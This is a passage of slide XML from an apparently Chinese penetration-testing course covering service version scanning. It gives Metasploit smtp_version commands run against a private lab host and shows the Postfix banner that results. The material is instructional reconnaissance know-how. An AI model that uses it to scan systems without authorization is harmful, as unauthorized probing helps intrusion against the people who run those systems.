                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="文本框 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5507990" y="808355"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.使用“show options”命令查看当前模块需要设置的参数，如图2-4-39所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5507990" y="1453515"/>
            <a:ext cx="5276850" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="文本框 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5507990" y="3196590"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-39 查看模块需要设置的参数4.使用“set RHOSTS 192.168.172.131”命令设置扫描目标主机地址，如图2-4-40所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5507990" y="4672965"/>
            <a:ext cx="5276850" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="文本框 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5507990" y="5320665"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-40 设置模块参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行SMTP服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤六</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="文本框 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5464175" y="1530667"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.使用“exploit”或“run”命令运行smtp_version模块，如图2-4-41所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5464175" y="2175827"/>
            <a:ext cx="5276850" cy="895350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5661025" y="3070860"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-41 运行smtp_version模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5464175" y="4093210"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="266700"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>从扫描结果可以看到，这台主机安装了SMTP服务，服务版本是“ESMTP Postfix(Ubuntu)”。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="266700"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用同样的方法，可以对目标主机的MySQL、Oracle、POP3等服务版本进行扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
